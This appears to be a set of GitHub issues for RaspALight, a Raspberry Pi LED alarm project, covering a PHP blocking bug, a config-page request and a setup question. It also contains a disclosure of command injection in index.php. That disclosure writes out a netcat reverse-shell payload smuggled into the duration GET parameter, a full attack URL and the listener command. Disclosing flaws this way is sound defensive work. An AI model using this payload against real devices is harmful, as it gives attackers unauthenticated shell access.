Topic says everything

When setting an alarm, the php script is excecuting a python file. Since this file is waiting for the alarm to begin, the php file would excecute the file till the end. So to stop the loading, you have to click on the alarm headline. Not optimal, but for now it does what it is supposed to do.
Trying to fix this, so that if you set an Alarm, you will be redirected again to the main page.

A sub-page for configuring things like:

1. the pins used, since people often use some GPIO pins for other projects as well
2. the standard variables like the duration or the cut off time

Hi,

I found two security flaws which allows attackers in the same network to perform remote commands over the web interface. For example in line

https://github.com/eweren/RaspALight/blob/master/ledcontrol/index.php#L30

an attacker could open a shell through netcat with the duration-GET-parameter set to ; nc -c /bin/sh <your IP> <any unfiltered port>.

Think about a scenario where the RaspALight runs on 10.1.1.7 and the attackers IP is 10.1.1.1. When you run nc -l -p 1337 -vvv on the attackers machine and open the url http://10.1.1.7/ledcontrol/index.php?time=1309&date=20170401&duration=; nc -c /bin/sh 10.1.1.1 1337, you get a remote shell without authenticating yourself.

The same is working in the following line with the abort-GET-parameter:

https://github.com/eweren/RaspALight/blob/master/ledcontrol/index.php#L40

Hi,

could you give some additional information please about the settings, using or a howto. How I marry your solution with jgarff/rpi_ws281x.
Should I use apache2 on the raspi or can I use another webserver, which are rules the raspi?

Regards in advance.